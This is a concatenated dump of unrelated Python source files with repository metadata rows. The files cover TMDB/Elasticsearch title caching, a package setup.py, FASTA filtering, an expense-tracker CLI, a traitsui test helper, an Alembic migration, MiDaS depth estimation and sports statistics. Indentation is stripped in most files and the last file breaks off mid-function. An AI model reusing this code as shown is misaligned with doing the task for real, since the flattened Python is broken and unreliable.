record["description"] = overview
# Save tagline if incoming one is longer
if "tagline" in title:
if "tagline" not in record:
record["tagline"] = ""
                    if len(title["tagline"]) > len(record["tagline"]):
record["tagline"] = title["tagline"]
# Get translations
translations = self.send_request_get(endPoint="{}/{}/translations".format(self.config["title_type"], title["id"]))
for translation in translations["translations"]:
if translation["iso_639_1"] in self.config["languages"]:
# Add Aliases
if self.check_for_dup(translation["data"][self.attrib["title"]], record["alias"], record["title"]):
record["alias"].append(translation["data"][self.attrib["title"]])
# Get alternative titles
altTitles = self.send_request_get(endPoint="{}/{}/alternative_titles".format(self.config["title_type"], title["id"]))
for titleName in altTitles[self.attrib["alt_titles"]]:
if titleName["iso_3166_1"] in self.config["countries"]:
if self.check_for_dup(titleName["title"], record["alias"], record["title"]):
record["alias"].append(titleName["title"])
                # Get images if none are available yet
if "image" not in record:
record["image"] = ""
if title["original_language"] == self.config["exception_language"]:
params = {"language": title["original_language"]}
else:
params = {"language": self.config["main_language"]}
images = self.send_request_get(endPoint="{}/{}/images".format(self.config["title_type"], title["id"]), params=params)
if not images["posters"] and not images["backdrops"]:
# Try to search without any language for art
images = self.send_request_get(endPoint="{}/{}/images".format(self.config["title_type"], title["id"]), params={"language": ""})
imageAspectRatio = 10
for image in images["posters"] + images["backdrops"]:
if abs(image["aspect_ratio"] - self.config["image_aspect_ratio"]) < abs(imageAspectRatio - self.config["image_aspect_ratio"]):
record["image"] = image["file_path"][1:]
                        imageAspectRatio = image["aspect_ratio"]  # remember the closest aspect ratio found so far
# Get TMDB Record IDs
if "ids" not in record:
record["ids"] = {}
if "tmdb" not in record["ids"]:
record["ids"]["tmdb"] = title["id"]
self.index_record(index=self.config["title_index"], recordId=recordId, record=record)
else:
logging.debug("No update required for {} ({}) ({})".format(esRecord["hits"]["hits"][0]["_source"]["title"], esRecord["hits"]["hits"][0]["_source"]["year"], self.config["title_type"]))
return record
def search_title(self, search):
# First query elasticsearch and check if title is returned without any additional caching
result = self.query_title(search=search)
# If no title has been returned, search by director and actors
if not result or search.get("force"):
crew = search.get("director", []) + search.get("actor", []) + search.get("other", [])
for person in crew:
self.search_person_tmdb(person=person, year=search.get("year"), force=search.get("force"))
# Query again in elasticsearch and if match then break
result = self.query_title(search=search)
if result:
break
# If no result found, search by name and year if avaliable
if not result or search.get("force"):
if "title" in search:
for title in search["title"]:
self.search_title_tmdb(title=title, year=search.get("year"), force=search.get("force"))
result = self.query_title(search=search)
# Try an exact match if no result yet
if not result:
if "title" in search:
result = self.query_title_exact(search=search)
# Try adjacent years if provided year is not a hit. This is a workaround as the year supplied by some providers is inaccurate
if not result:
if search.get("year"):
for yearDiff in range(0, self.config["year_diff"] + 1):
final = False
if yearDiff == self.config["year_diff"]:
final = True
result = self.query_title(search=search, yearDiff=yearDiff, final=final)
if result:
break
else:
result = self.query_title(search=search, final=True)
if result:
logging.debug("Found {} ({}) in elasticsearch (Score: {:.1f})".format(result["_source"]["title"], self.config["title_type"], result["_score"]))
result = self.process_result(result=result, force=search.get("force"))
return result
def query_title_exact(self, search):
query = {"from": 0, "size": 1, "query": {}}
query["query"]["bool"] = {}
query["query"]["bool"]["should"] = []
if "title" in search:
for title in search["title"]:
query["query"]["bool"]["should"].append({"multi_match": {"query": title, "fields": ["title.keyword", "alias.keyword"]}})
result = self.get_record_by_query(index=self.config["title_index"], query=query)
if result["hits"]["total"]["value"] > 0:
if result["hits"]["hits"][0]["_score"] >= self.config["min_score_exact"]:
return result["hits"]["hits"][0]
def query_title(self, search, final=False, yearDiff=0):
query = {"from": 0, "size": 1, "query": {}}
query["query"]["bool"] = {}
query["query"]["bool"]["must"] = []
query["query"]["bool"]["should"] = []
if "title" in search:
for title in search["title"]:
query["query"]["bool"]["should"].append({"multi_match": {"query": title, "fields": ["title", "alias"]}})
if "director" in search:
for director in search["director"]:
query["query"]["bool"]["should"].append({"match": {"credits.director": director}})
if "actor" in search:
for actor in search["actor"]:
query["query"]["bool"]["should"].append({"match": {"credits.actor": actor}})
if "other" in search:
for producer in search["other"]:
query["query"]["bool"]["should"].append({"match": {"credits.other": producer}})
if "country" in search:
for country in search["country"]:
countryCode = self.countryCodes.get(country)
if countryCode:
query["query"]["bool"]["should"].append({"match": {"country": countryCode}})
if "year" in search:
search["year"] = int(search["year"])
year = {}
year["bool"] = {}
year["bool"]["should"] = []
year["bool"]["should"].append({"range": {"year": {"gte": search["year"] - yearDiff, "lte": search["year"] + yearDiff}}})
query["query"]["bool"]["must"].append(year)
# Calculate min score
if not final:
minScore = self.config["min_score_no_search"]
else:
minScore = self.config["min_score"]
if "actor" in search:
minScore += len(search["actor"] * self.config["score_increment_per_actor"])
result = self.get_record_by_query(index=self.config["title_index"], query=query)
if result["hits"]["total"]["value"] > 0:
if result["hits"]["hits"][0]["_score"] >= minScore:
return result["hits"]["hits"][0]
if final:
logging.debug("Best result {} (Score: {:.1f} Min Score: {})".format(result["hits"]["hits"][0]["_source"]["title"], result["hits"]["hits"][0]["_score"], minScore))
else:
if final:
logging.debug("No results found for {}".format(search["title"][0]))
def process_result(self, result, force):
# Check if record requires updating
title = {"id": result["_source"]["ids"]["tmdb"], "original_language": result["_source"]["language"]}
result["_source"] = self.cache_title(title=title, force=force, record=result)
# Generate full image URL if missing
result["_source"]["image"] = self.get_image_url(image=result["_source"]["image"])
# Convert country code to full name
countries = []
for countryCode in result["_source"]["country"]:
countries.append(self.countries.get(countryCode, "Unknown"))
result["_source"]["country"] = countries
# Convert language code to full name
result["_source"]["language"] = self.languages.get(result["_source"]["language"], "Unknown")
# Convert genre code
genres = []
for genreId in result["_source"]["genre"]:
genre = self.genres.get(genreId)
if genre:
genres.append(self.genres[genreId])
if genres:
result["_source"]["genre"] = genres
return result
def search_person_tmdb(self, person, year, force):
performSearch = force
recordId = None
# Check if search was already performed
query = {"query": {"bool": {"must": []}}}
query["query"]["bool"]["must"].append({"term": {"person": person}})
query["query"]["bool"]["must"].append({"term": {"year": year or -1}})
result = self.get_record_by_query(index=self.config["search_index"], query=query)
if result["hits"]["total"]["value"] == 0:
performSearch = True
else:
# Check if person is up for an update:
if self.check_update_required(timestamp=result["hits"]["hits"][0]["_source"]["@timestamp"]):
performSearch = True
recordId = result["hits"]["hits"][0]["_id"]
if performSearch:
# Query TMDB for person
params = {"include_adult": "false", "page": 1}
params["query"] = person
logging.info("Searching for person : {}".format(person))
response = self.send_request_get("search/person", params=params)
if "total_results" in response:
if response["total_results"] > 0:
for personRecord in response["results"]:
# Search credits of person found
logging.info("Getting credits : {} ({}) ({})".format(personRecord["name"], year, self.config["title_type"]))
credits = self.send_request_get("person/{}/{}_credits".format(personRecord["id"], self.config["title_type"]))
# Find titles during years around query or if year=-1 all credits
if "crew" in credits:
for credit in credits["crew"] + credits["cast"]:
if "release_date" in credit and year:
if credit["release_date"] != '' and credit["release_date"]:
creditYear = int(credit["release_date"][:4])
if abs(year - creditYear) > self.config["year_diff"]:
continue
self.cache_title(title=credit, force=force, record={})
# Save that name and year to avoid doing the same search again
record = {}
record["person"] = person
record["year"] = year or -1
self.index_record(index=self.config["search_index"], record=record, recordId=recordId)
else:
logging.debug("Already searched credits for {} ({}) ({})".format(person, year, self.config["title_type"]))
def search_title_tmdb(self, title, year, force):
performSearch = force
recordId = None
# Check if search was already performed
query = {"query": {"bool": {"must": []}}}
query["query"]["bool"]["must"].append({"term": {"title": title}})
query["query"]["bool"]["must"].append({"term": {"year": year or -1}})
result = self.get_record_by_query(index=self.config["search_index"], query=query)
if result["hits"]["total"]["value"] == 0:
performSearch = True
else:
# Check if person is up for an update:
if self.check_update_required(timestamp=result["hits"]["hits"][0]["_source"]["@timestamp"]):
performSearch = True
recordId = result["hits"]["hits"][0]["_id"]
if performSearch:
params = {"include_adult": "false", "page": 1}
params["query"] = title
if year:
params["year"] = year
logging.info("Searching for title : {} ({}) ({})".format(title, year, self.config["title_type"]))
response = self.send_request_get(endPoint="search/{}".format(self.config["title_type"]), params=params)
if "total_results" in response:
if response["total_results"] > 0:
for result in response["results"][:5]:
self.cache_title(title=result, force=force, record={})
# Save title and year to avoid doing the same search again
record = {}
record["title"] = title
record["year"] = year or -1
self.index_record(index=self.config["search_index"], record=record, recordId=recordId)
else:
logging.debug("Already searched title {} ({}) ({})".format(title, year, self.config["title_type"]))
def get_image_url(self, image):
if "http" not in image:
return "{}/{}".format(self.config["image_base_url"], image)
else:
return image
def check_for_dup(self, title, alias, orgTitle=""):
if title == "":
return False
if alias:
for altTitle in alias + [orgTitle]:
if re.search("^{}$".format(re.escape(title)), altTitle, flags=re.IGNORECASE):
return False
else:
return True
if orgTitle:
if re.search("^{}$".format(re.escape(title)), orgTitle, flags=re.IGNORECASE):
return False
return True
def render_template(self, record, template):
if template == "description":
return self.description_template.render(record=record)
elif template == "subtitle":
return self.subtitle_template.render(record=record)
def check_index(self, indexName, indexMappingFile):
if not self.es.indices.exists(index=indexName):
with open(os.path.join(os.path.dirname(__file__), "index_mapping", indexMappingFile), "r") as mappingFile:
indexSettings = mappingFile.read()
response = self.es.indices.create(index=indexName, body=indexSettings)
if response["acknowledged"]:
logging.info("Created {} index".format(indexName))
def get_record_by_query(self, index, query, refreshIndex=True):
if refreshIndex:
self.es.indices.refresh(index=index)
return self.es.search(index=index, body=query)
def index_record(self, index, record, recordId=None):
record["@timestamp"] = datetime.datetime.utcnow().isoformat()
self.es.index(index=index, id=recordId, body=record)
def check_update_required(self, timestamp):
timestamp = datetime.datetime.strptime(timestamp, "%Y-%m-%dT%H:%M:%S.%f")
if timestamp < datetime.datetime.utcnow() - datetime.timedelta(days=self.config["refresh_after_days"]) or timestamp <= self.config["refresh_if_older"]:
return True
else:
return False
def cache_configuration(self):
self.genres = {}
self.countries = {}
self.countryCodes = {}
self.languages = {}
genres = self.send_request_get(endPoint="genre/{}/list".format(self.config["title_type"]))
if genres:
for genre in genres["genres"]:
self.genres[genre["id"]] = genre["name"]
countries = self.send_request_get(endPoint="configuration/countries")
if countries:
for country in countries:
self.countries[country["iso_3166_1"]] = country["english_name"]
self.countryCodes[country["english_name"]] = country["iso_3166_1"]
languages = self.send_request_get(endPoint="configuration/languages")
if languages:
for language in languages:
self.languages[language["iso_639_1"]] = language["english_name"]
backgroundUrl = self.send_request_get(endPoint="configuration")
if backgroundUrl:
self.config["image_base_url"] = backgroundUrl["images"]["base_url"]
self.config["image_base_url"] += self.config["tmdb_image_type"]
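# For reference, query_title() above assembles a bool query of "should" clauses
# plus a year "range" wrapped inside "must". For a hypothetical search such as
# {"title": ["Heat"], "director": ["Michael Mann"], "year": 1995} with yearDiff=0,
# the body sent to Elasticsearch has this shape:
_example_query = {
    "from": 0,
    "size": 1,
    "query": {"bool": {
        "must": [{"bool": {"should": [
            {"range": {"year": {"gte": 1995, "lte": 1995}}},
        ]}}],
        "should": [
            {"multi_match": {"query": "Heat", "fields": ["title", "alias"]}},
            {"match": {"credits.director": "Michael Mann"}},
        ],
    }},
}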
|
shaunschembri/ElasticTMDB
|
elastictmdb/__init__.py
|
__init__.py
|
py
| 27,602 |
python
|
en
|
code
| 4 |
github-code
|
6
|
26126736743
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""The setup script."""
# Imports
import io
from setuptools import setup, find_packages
# Readme file
with io.open('README.rst', encoding='utf-8') as readme_file:
readme = readme_file.read()
# ChangeLog file
with io.open('HISTORY.rst', encoding='utf-8') as history_file:
history = history_file.read()
# Requirements Variable
requirements: list = [
# Package Requirements
'sentry_sdk',
'pytest',
]
# Setup Requirements Variable
setup_requirements: list = [
# Setup Requirements
]
# Test Requirements Variable
test_requirements: list = [
# Test Requirements
'pylint',
'pytest',
'coverage'
]
setup(
# Name of Package
name='pwbs',
# Version following SemVer Style
version='0.5.0-dev2',
# Description of the Package
    description='PWBS is a build system for easy automation of processes.',
# Description of the Package to show on PyPi (Longer Description)
long_description=readme + '\n\n' + history,
# The Project Mainpage [For that project for now is just repository]
url='https://gitlab.com/paip-web/pwbs',
# Author Details
author='Patryk Adamczyk',
author_email='[email protected]',
# License
license='MIT',
# Classifiers of the Project
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
# How mature is this project? Common values are
# 'Development Status :: 1 - Planning'
# 'Development Status :: 2 - Pre-Alpha'
# 'Development Status :: 3 - Alpha'
# 'Development Status :: 4 - Beta'
# 'Development Status :: 5 - Production/Stable'
# 'Development Status :: 6 - Mature'
# 'Development Status :: 7 - Inactive'
'Development Status :: 2 - Pre-Alpha',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'Intended Audience :: Information Technology',
'Intended Audience :: System Administrators',
# Topic
'Topic :: Software Development',
'Topic :: Software Development :: Build Tools',
'Topic :: Utilities',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: MIT License',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3 :: Only',
'Operating System :: OS Independent',
'Operating System :: Microsoft :: Windows',
'Operating System :: Microsoft :: Windows :: Windows 7',
'Operating System :: Microsoft :: Windows :: Windows 10',
'Operating System :: POSIX :: Linux',
'Environment :: Console'
],
# Keywords of your Project
keywords='development build tools task runner',
# You can just specify the packages manually here if your project is
# simple. Or you can use find_packages().
packages=find_packages(exclude=['contrib', 'docs', 'tests']),
# packages=["pwbs"],
# packages=find_packages(exclude=['docs', 'tests*']),
# Alternatively, if you want to distribute just a my_module.py, uncomment
# this:
# py_modules=["my_module"],
# Dependencies of the Project
install_requires=requirements,
tests_require=test_requirements,
setup_requires=setup_requirements,
# List additional groups of dependencies here (e.g. development
# dependencies). You can install these using the following syntax,
# for example:
# $ pip install -e .[dev,test]
extras_require={
'setup': ["wheel", "twine", "collective.checkdocs"],
'test': ['pylint', 'pytest', 'coverage'],
},
# If there are data files included in your packages that need to be
# installed, specify them here. If using Python 2.6 or less, then these
# have to be included in MANIFEST.in as well.
# package_data={
# 'sample': ['package_data.dat'],
# },
# Although 'package_data' is the preferred approach, in some case you may
# need to place data files outside of your packages. See:
# http://docs.python.org/3.4/distutils/setupscript.html#installing-additional-files # noqa
# In this case, 'data_file' will be installed into '<sys.prefix>/my_data'
# data_files=[('my_data', ['data/data_file'])],
# To provide executable scripts, use entry points in preference to the
# "scripts" keyword. Entry points provide cross-platform support and allow
# pip to create the appropriate form of executable for the target platform.
entry_points={
'console_scripts': [
'pwbs=pwbs:main',
],
},
# Python Required Version for the package
python_requires='~=3.6',
)
|
paip-web/pwbs
|
setup.py
|
setup.py
|
py
| 4,954 |
python
|
en
|
code
| 2 |
github-code
|
6
|
42793161783
|
import sys
blastfile = open(sys.argv[1], 'r')
earlyfasta = open(sys.argv[2], 'r')
latefasta = open(sys.argv[3], 'r')
earlycore = open(sys.argv[4], 'w')
latecore = open(sys.argv[5], 'w')
late = []
early = []
def get_next_fasta (fileObject):
'''usage: for header, seq in get_next_fasta(fileObject):
'''
header = ''
seq = ''
#The following for loop gets the header of the first fasta
#record. Skips any leading junk in the file
for line in fileObject:
if line.startswith('>'):
header = line.strip()
break
for line in fileObject:
if line.startswith('>'):
yield header, seq
header = line.strip()
seq = ''
else:
seq += line.strip()
#yield the last entry
if header:
yield header, seq
for line in blastfile:
line = line.split()
late.append(line[0])
early.append(line[1])
for header, seq in get_next_fasta(earlyfasta):
if header[1:].strip() in early:
earlycore.write("%s\n%s\n" % (header, seq))
for header, seq in get_next_fasta(latefasta):
if header[1:].strip() in late:
latecore.write("%s\n%s\n" % (header, seq))
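# Illustrative invocation (argument order follows the sys.argv reads above; the
# file names are placeholders):
#   python getcoregenes.py hits.blast early.fasta late.fasta early_core.fasta late_core.fasta
# Column 1 of the tabular BLAST file is treated as a "late" ID and column 2 as an
# "early" ID; only FASTA records whose headers match those IDs are written out.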
|
kdiverson/seqTools
|
getcoregenes.py
|
getcoregenes.py
|
py
| 1,209 |
python
|
en
|
code
| 3 |
github-code
|
6
|
71133520507
|
from Logic.Crud import *
from Logic.Operatii import *
import datetime
def arata_meniu():
'''
    :return: prints the menu options
'''
print("1.Adaugare cheltuiala")
print("2.Stergere cheltuiala")
print("3.Modificare cheltuiala")
print("4.Stergerea cheltuielilor pentru un nr de apartament")
print("5.Adaugre suma pentru toate cheltuielile dintr-o data citita de la tastatura")
print("6.Afisarea cheltuielilor cu suma cea mai mare pentru fiecare tip")
print("7.Ordonarea cheltuielilor crescator dupa suma")
print("8.Afisarea sumelor lunare pentru fiecare apartament")
print("9.Afisare lista")
print("10.Undo")
print("11.Redo")
print("0.Iesire")
def citire_data():
date_str=input("Dati data separate prin spatiu")
data=date_str.split(" ")
an=int(data[0])
luna=int(data[1])
zi=int(data[2])
return datetime.date(an,luna,zi)
def afisare_adaugare(lista,lst_undo,lst_redo):
"""
    :param lista: the list of expenses
    :return: the list with the newly created expense added
"""
try:
id=int(input("Dati id :"))
nr_apartament = int(input('Dati nr apartamentului : '))
suma = float(input('Dati suma: '))
data = input("Dati data separata prin - :")
tipul = input("Dati tipul:")
return adaugare_cheltuiala(lista, id, nr_apartament, suma, data, tipul,lst_undo,lst_redo)
except ValueError as ve:
print("Eroare",ve)
return lista
def afisare_stergere(lista,lst_undo,lst_redo):
'''
    :param lista: a list of expenses
    :return: the list with the selected expense removed
'''
try:
nr_apartament = int(input("Dati nr apartamentului care va fi sters"))
return stergere_cheltuiala(nr_apartament, lista,lst_undo,lst_redo)
except ValueError as ve:
print("Eroare",ve)
return lista
def afisare_modificare(lista,lst_undo,lst_redo):
'''
    :param lista: the list of expenses
    :return: the modified list
'''
try:
id=int(input("Dati id "))
nr_apartament =int(input('Dati nr apartamentului de modificat: '))
suma = float(input('Dati suma: '))
data = input("Dati data separata prin -:")
tipul = input('Dati tipul: ')
return modificare_cheltuiala(lista,id, nr_apartament, suma, data, tipul,lst_undo,lst_redo)
except ValueError as ve:
print("Eroare",ve)
return lista
def afisare_stergere_cheltuiala_nr_apartament(lista,lst_undo,lst_redo):
'''
    Deletes the last expense that has a given apartment number
    :param lista: the list of expenses
    :return: the list of remaining expenses
'''
nr_apartament=int(input("Introduceti nr de apartament:"))
return stergere_cheltuieli_pentru_un_apartament(lista,nr_apartament,lst_undo,lst_redo)
def afisare_adaugare_valoare_la_toate_cheltuielile(lista,lst_undo,lst_redo):
'''
    :param lista: the list of expenses
    :return: the list with the given amount added to every expense on the given date
'''
dat= input("Dati data separata prin -:")
sum = int(input("Dati suma:"))
cheltuieli_lista = adunare_valoare_la_toate_cheltuielile(lista,dat,sum,lst_undo,lst_redo)
return cheltuieli_lista
def afisare_maxim_cheltuieli_pentru_fiecare_tip(lista):
tip_cheltuieli=max_cheltuiala_pentru_fiecare_tip(lista)
for tipul,cheltuiala in tip_cheltuieli.items():
print("{} : {}".format(tipul,cheltuiala))
def afisare_sume_lunare_cheltuieli(lista):
result = sume_lunare(lista)
for luna in result:
print(f'Pentru Luna {luna} avem lista de sume: {result[luna]}')
def afisare_lista(lista):
for cheltuiala in lista:
print(to_string(cheltuiala))
def afisare_undo(lista, lst_undo, lst_redo):
undo_result = undo(lista, lst_undo, lst_redo)
if undo_result is not None:
return undo_result
return lista
def afisare_redo(lista, lst_undo, lst_redo):
redo_result = redo(lista, lst_undo, lst_redo)
if redo_result is not None:
return redo_result
return lista
def interfata(lista,lst_undo,lst_redo):
    """Command-line menu loop"""
while True:
arata_meniu()
op=int(input("Alegeti optiunea"))
        if op == 1:
            lista = afisare_adaugare(lista, lst_undo, lst_redo)
        elif op == 2:
            lista = afisare_stergere(lista, lst_undo, lst_redo)
        elif op == 3:
            lista = afisare_modificare(lista, lst_undo, lst_redo)
        elif op == 4:
            lista = afisare_stergere_cheltuiala_nr_apartament(lista, lst_undo, lst_redo)
        elif op == 5:
            lista = afisare_adaugare_valoare_la_toate_cheltuielile(lista, lst_undo, lst_redo)
        elif op == 6:
            print(max_cheltuiala_pentru_fiecare_tip(lista))
        elif op == 7:
            lista = ordonare_cheltuieli_dupa_suma(lista, lst_undo, lst_redo)
        elif op == 8:
            afisare_sume_lunare_cheltuieli(lista)
        elif op == 9:
            afisare_lista(lista)
        elif op == 10:
            lista = afisare_undo(lista, lst_undo, lst_redo)
        elif op == 11:
            lista = afisare_redo(lista, lst_undo, lst_redo)
        elif op == 0:
            break
        else:
            print("Invalid")
|
AP-MI-2021/lab-567-Pop-Sergiu-Adrian
|
lab5/Ui/Interfata.py
|
Interfata.py
|
py
| 5,122 |
python
|
es
|
code
| 0 |
github-code
|
6
|
30358044871
|
import wx
from traitsui.wx.check_list_editor import CustomEditor
from traitsui.testing.tester.command import MouseClick
from traitsui.testing.tester.locator import Index
from traitsui.testing.tester._ui_tester_registry._common_ui_targets import (
BaseSourceWithLocation,
)
from traitsui.testing.tester._ui_tester_registry._layout import (
column_major_to_row_major,
)
from traitsui.testing.tester._ui_tester_registry.wx import _interaction_helpers
class _IndexedCustomCheckListEditor(BaseSourceWithLocation):
"""Wrapper for CheckListEditor + Index"""
source_class = CustomEditor
locator_class = Index
handlers = [
(
MouseClick,
(
lambda wrapper, _: _interaction_helpers.mouse_click_checkbox_child_in_panel(
control=wrapper._target.source.control,
index=convert_index(
source=wrapper._target.source,
index=wrapper._target.location.index,
),
delay=wrapper.delay,
)
),
),
]
def convert_index(source, index):
"""Helper function to convert an index for a GridSizer so that the
index counts over the grid in the correct direction.
The grid is always populated in row major order, however, the elements
are assigned to each entry in the grid so that when displayed they appear
in column major order.
Sizers are indexed in the order they are populated, so to access
the correct element we may need to convert a column-major based index
into a row-major one.
Parameters
----------
control : CustomEditor
The Custom CheckList Editor of interest. Its control is the wx.Panel
containing child objects organized with a wx.GridSizer
index : int
the index of interest
"""
sizer = source.control.GetSizer()
if isinstance(sizer, wx.BoxSizer):
return index
n = len(source.names)
num_cols = sizer.GetCols()
num_rows = sizer.GetEffectiveRowsCount()
return column_major_to_row_major(index, n, num_rows, num_cols)
def register(registry):
"""Register interactions for the given registry.
If there are any conflicts, an error will occur.
Parameters
----------
registry : TargetRegistry
The registry being registered to.
"""
_IndexedCustomCheckListEditor.register(registry)
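# Rough illustration of the index conversion convert_index() performs (the real
# arithmetic lives in column_major_to_row_major; this sketch only mirrors the idea
# for a hypothetical full 2-row x 3-column grid):
#   displayed (column-major)      sizer children (row-major)
#   item0  item2  item4           slot0  slot1  slot2
#   item1  item3  item5           slot3  slot4  slot5
# so clicking displayed item 3 must target sizer slot 1 * 3 + 1 = 4.
def _col_major_to_row_major_sketch(index, num_rows, num_cols):
    row, col = index % num_rows, index // num_rows
    return row * num_cols + col
assert _col_major_to_row_major_sketch(3, num_rows=2, num_cols=3) == 4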
|
enthought/traitsui
|
traitsui/testing/tester/_ui_tester_registry/wx/_traitsui/check_list_editor.py
|
check_list_editor.py
|
py
| 2,444 |
python
|
en
|
code
| 290 |
github-code
|
6
|
5093704747
|
"""empty message
Revision ID: b3ff59df2833
Revises: fee4d1b1d192
Create Date: 2022-04-08 07:33:52.082355
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import mysql
# revision identifiers, used by Alembic.
revision = 'b3ff59df2833'
down_revision = 'fee4d1b1d192'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.alter_column('product', 'image',
existing_type=mysql.VARCHAR(length=200),
type_=sa.String(length=20000),
existing_nullable=True)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.alter_column('product', 'image',
existing_type=sa.String(length=20000),
type_=mysql.VARCHAR(length=200),
existing_nullable=True)
# ### end Alembic commands ###
|
sudiptob2/microserve-main
|
migrations/versions/b3ff59df2833_.py
|
b3ff59df2833_.py
|
py
| 934 |
python
|
en
|
code
| 1 |
github-code
|
6
|
20040106137
|
string = 'THis iS AN ExamPLe'
command = 'CAPitalize'
def string_op(string, command):
command_list = ['upper','lower','capitalize']
command_low = command.lower()
nw_str = []
if command_low not in command_list:
nw_str = "Invalid command!"
elif command_low == 'upper':
nw_str = string.upper()
elif command_low == 'lower':
nw_str = string.lower()
else:
nw_str = string.capitalize()
return nw_str
print(string_op(string, command))
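# A few extra calls covering the remaining branches (illustrative only):
print(string_op(string, 'upper'))  # THIS IS AN EXAMPLE
print(string_op(string, 'lower'))  # this is an example
print(string_op(string, 'shout'))  # Invalid command!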
|
mwboiss/DSI-Prep
|
inter_py/string_op.py
|
string_op.py
|
py
| 491 |
python
|
en
|
code
| 0 |
github-code
|
6
|
12769514952
|
import cv2
from cv2 import waitKey
import torch
import urllib.request
import os
import matplotlib.pyplot as plt
print(torch.__version__)
os.environ["KMP_DUPLICATE_LIB_OK"] = "TRUE"
# url, filename = ("https://github.com/pytorch/hub/raw/master/images/dog.jpg", "dog.jpg")
# urllib.request.urlretrieve(url, filename)
model_type = "DPT_Large" # MiDaS v3 - Large (highest accuracy, slowest inference speed)
#model_type = "DPT_Hybrid" # MiDaS v3 - Hybrid (medium accuracy, medium inference speed)
#model_type = "MiDaS_small" # MiDaS v2.1 - Small (lowest accuracy, highest inference speed)
midas = torch.hub.load("intel-isl/MiDaS", model_type)
# change to gpu
device = torch.device("cuda") if torch.cuda.is_available() else torch.device("cpu")
midas.to(device)
midas.eval()
# Load transforms to resize and normalize the image for large or small model
midas_transforms = torch.hub.load("intel-isl/MiDaS", "transforms")
if model_type == "DPT_Large" or model_type == "DPT_Hybrid":
transform = midas_transforms.dpt_transform
else:
transform = midas_transforms.small_transform
# Load image and apply transforms
filename = '1646652789610919952.jpg'
img = cv2.imread(filename)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
input_batch = transform(img).to(device)
# Predict and resize to original resolution
with torch.no_grad():
prediction = midas(input_batch)
prediction = torch.nn.functional.interpolate(
prediction.unsqueeze(1),
size=img.shape[:2],
mode="bicubic",
align_corners=False
).squeeze()
output = prediction.cpu().numpy()
plt.imshow(output)
plt.show()
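# Optionally persist the depth map next to the matplotlib preview; the output
# name below is arbitrary. cv2.imwrite expects an 8-bit image, so the raw
# prediction is min-max normalized to 0-255 first.
depth_vis = cv2.normalize(output, None, 0, 255, cv2.NORM_MINMAX).astype('uint8')
cv2.imwrite('depth_' + filename, depth_vis)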
|
JohnLee16/InfraredImage2Depth
|
src/midas_depth.py
|
midas_depth.py
|
py
| 1,628 |
python
|
en
|
code
| 0 |
github-code
|
6
|
23934349151
|
from pymongo import MongoClient
import pprint
import statistics
client = MongoClient('mongodb://localhost:27017/')
db = client.fantasypros
def find():
players = db.playersbywk.distinct("name")
for player in players:
getstats(player)
def getstats(player):
points = []
player_position = ''
projection = {"_id": 0, "total_points": 1, "position": 1}
query = {'name': player}
player_details = db.playersbywk.find(query, projection)
for player_detail in player_details:
points.append(player_detail['total_points'])
player_position = player_detail['position']
savestats(player, points, player_position)
def savestats(player, points, player_position):
player_dict = {}
player_dict['name'] = player
print("Player: " + player)
player_dict['position'] = player_position
print("Position: " + player_position)
player_dict['mean'] = str(statistics.mean(points))
print("Mean is: " + str(statistics.mean(points)))
if len(points) >= 2:
player_dict['stdev'] = str(statistics.stdev(points))
print("Standard Deviation is: " + str(statistics.stdev(points)))
if statistics.mean(points) != 0 and len(points) >= 2:
player_dict['coeff_var'] = str(statistics.stdev(points)/statistics.mean(points))
print("Coefficient of Variance is: " + str(statistics.stdev(points)/statistics.mean(points)))
print("Number of games: " + str(len(points)))
player_dict['num_of_games'] = str(len(points))
    db.players.insert_one(player_dict)  # Collection.insert() was removed in PyMongo 4; insert_one() is the supported call
if __name__ == '__main__':
find()
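# Quick self-check of the statistics used above (illustrative numbers only):
# the coefficient of variation is stdev / mean, so a wider spread around the
# same mean gives a larger value.
import statistics as _st
_pts = [10.0, 14.0, 18.0]
print(_st.mean(_pts), _st.stdev(_pts), _st.stdev(_pts) / _st.mean(_pts))  # 14.0 4.0 0.2857...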
|
soboy2/pyrandom
|
fbstats.py
|
fbstats.py
|
py
| 1,583 |
python
|
en
|
code
| 0 |
github-code
|
6
|
20869059181
|
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.cm as cm
import matplotlib
import random
vida=[]
defesa=[]
ataque=[]
# Data splitter
def separador_atributos(arquivo):
vida_max=0
vida_min=18
def_max=0
def_min=18
atk_max=0
atk_min=18
numero_pontos=0
linha=arquivo.readline()
while linha:
atributos=linha.split()
        # transfer the values from the text line into the lists
vida.append(int(atributos[0]))
if(int(atributos[0])>vida_max):
vida_max=int(atributos[0])
if(int(atributos[0])<vida_min):
vida_min=int(atributos[0])
defesa.append(int(atributos[1]))
if(int(atributos[1])>def_max):
def_max=int(atributos[1])
if(int(atributos[1])<def_min):
def_min=int(atributos[1])
ataque.append(int(atributos[2]))
if(int(atributos[2])>atk_max):
atk_max=int(atributos[2])
if(int(atributos[2])<atk_min):
atk_min=int(atributos[2])
numero_pontos+=1
linha=arquivo.readline()
arquivo.close()
return(vida_max, vida_min, def_max, def_min, atk_max, atk_min, numero_pontos)
def frequencia_absoluta(atributo ,atributo_max, atributo_min, numero_pontos):
num_atributo=[0]*18
maior_F=0
    for i in range((atributo_max-atributo_min)+1):  # check every possible attribute value
        for j in range(numero_pontos):  # sweep over all points
            if(atributo[j]==(i+1)):  # if the attribute matches the value being evaluated
                num_atributo[i]+=((1/numero_pontos))  # store into the frequency vector for attribute value i+1
if(num_atributo[i]>maior_F):
maior_F=num_atributo[i]
return(num_atributo)
def ajuste_cmap(frequencia_vida, frequencia_def, frequencia_atk, numero_pontos):
c=[]
for i in range(numero_pontos):
c.append((frequencia_vida[(vida[i]-1)])*(frequencia_def[(defesa[i]-1)])*(frequencia_atk[(ataque[i]-1)]))
return(c)
def modelo_calculado():
modelo=open("../modelo.txt", "r")
